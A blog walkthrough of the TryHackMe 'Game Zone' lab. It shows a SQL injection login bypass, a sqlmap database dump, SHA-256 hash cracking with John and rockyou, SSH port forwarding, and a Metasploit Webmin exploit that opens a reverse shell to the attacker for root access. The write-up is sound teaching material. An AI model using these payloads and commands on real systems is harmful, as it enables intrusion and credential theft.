Open in app

Sign in

Write

Sign in

TryHackMe Game Zone Writeup/Walkthrough

Parker Cowan
6 min readNov 5, 2021

Welcome back to another writeup! Today we’ll be looking at TryHackMe’s Game Zone. This one is relatively quick and covers some SQLi/SQLmapping as well as some hash cracking! As always lets jump right in.

The first thing we’ll be greeted with upon entering the ip into our browser is the following homepage:

If you aren’t familiar with the bald man on the front, obviously you need to go play the Hitman games! Or you can just reverse image search. Your call.

More notably however we see some user input boxes for Log in, password, and site search. We can check if these are susceptible using some basic SQLi checks. We can attempt to bypass the login authentication using the following SQL command:

' OR 1=1; -- -

This works because when we enter a username into the login box, the websites queries the SQL server using the following command:

SELECT * FROM users WHERE username = 'foouser' AND password = 'foo'

However, when we enter in our payload, foouser becomes:

SELECT * FROM users WHERE username = '' OR 1=1-- -' AND password = 'foo'

Notice that our first quotation actually closes the original argument string This essentially creates a statement that is always true. Furthermore, the two trailing dashes tell SQL to ignore anything after the dashes. Thus what SQL actually sees is:

SELECT * FROM users WHERE username = '' OR 1=1

This always evaluates to true, and we are able to login. We are brought to this page:

Now it’s time for some more advanced SQL injection using SQLmap. SQLmap is an incredibly useful tool capable of detecting and exploiting SQL injection vulnerabilities. In this case our life is made much easier if we use it in conjunction with burpsuite. Make sure to setup your proxy in Firefox as follows in order for burpsuite to work.

Once that is done open up burp and let’s set the target so we only see requests from our target website. Note that the IP of your machine may be different of course.

Now we can turn on our proxy, and try typing in a test search into our new webpage we found.

As we can see, burp has picked up the request, and we can see our input at the bottom, “searchitem=test”. Right click on the request and click copy to file. We’ll need this request for our SQLmapping. Navigate to the directory you saved it in and then we can run:

sqlmap -r request.txt --dbms=mysql --dump

And SQLmap will begin working it’s magic. Go along with the prompts until the enumeration is complete. You should get two tables in the output.

Most notably, we see a password hash and a username. Throwing that hash into https://www.tunnelsup.com/hash-analyzer/ will give us the hash type, which in this case is important as John won’t correctly identify it unless we specify the hash type. We see it’s SHA–256. Let’s put this hash into a text document and then pass it through john.

john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha256

I was only able to crack this hash using the full rockyou.txt wordlist, I tried each one from rockyou-15.txt all the way to rockyou-70.txt. After it completes we can print the password using:

John --show --format=raw-sha256 hashes.txt

Now let’s use these new-found credentials and attempt to SSH into the system.

ssh agent47@10.10.147.235

And we’re in!

The user.txt is immediately available in /home/agent47. Next let’s work on further enumerating the system with our shell. Running

ss -tulpn

shows us there is a service running on port 10000. We can’t access this from our machine however, so we need to find a way to forward this port and bypass the firewall. We can do this through a reverse SSH tunnel. Reverse SSH Tunnels work in situations where you need to connect to a remote machine with a strict firewall policy from a local machine with a lax firewall policy. In this case, the remote machine is our target, and the local machine is our kali machine. By sending the reverse SSH request, we ask the remote machine to connect back to us, effectively forwarding our desired port. All we need to do after is connect to localhost from our local machine on our new port. If that seems kind of confusing, don’t worry, I was confused too. Let’s see it in action and perhaps that will shed more light on this situation.

First, on our local machine, we type

ssh -L 10000:localhost:10000 agent47@10.10.147.235

Note that we can also initiate this tunnel from our first SSH client. In that case we would use:

ssh -R 10000:localhost:10000 localmachine@localhost

However, that requires us to setup SSH on our kali machine, so let’s go for the first option for now.

Now that the reverse tunnel is set, we should be able to access port 10000. Let’s try it in our web browser.

Indeed, we have a new login page. Let’s try the same credentials as before.

And we’re in! Lot’s of info to get from here. Looks like we are on webmin version 1.58. Plugging this into searchsploit gives us:

Perfect, our first result is on Metasploit and is for our version. Let’s load that up.

msfconsole
msf > use exploit/unix/webapp/webmin_show_cgi_exec
set SSL false
set rhosts localhost
set username agent47
set password *spoiler->redacted*

Next we need to pick a payload. To list available payloads we can do:

I went with payload 5: cmd/unix/reverse. set LHOST to your VPN IP, and let it rip!

When you load the session it may seem like nothing has happend but a quick whoami proves the shell is working.

The final flag is found in /root/root.txt

And that’s all for this one! A fun lab in my opinion, and I had fun learning about reverse SSH port forwarding during this one! I hope this helped anyone who was stuck and please feel free to leave any comments/corrections/suggestions you may have! Thanks!

--

--

Parker Cowan

Written by Parker Cowan

1 Follower

I am an electrical engineering student at the University of British Columbia, who has a passion for cybersecurity and ethical hacking.

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams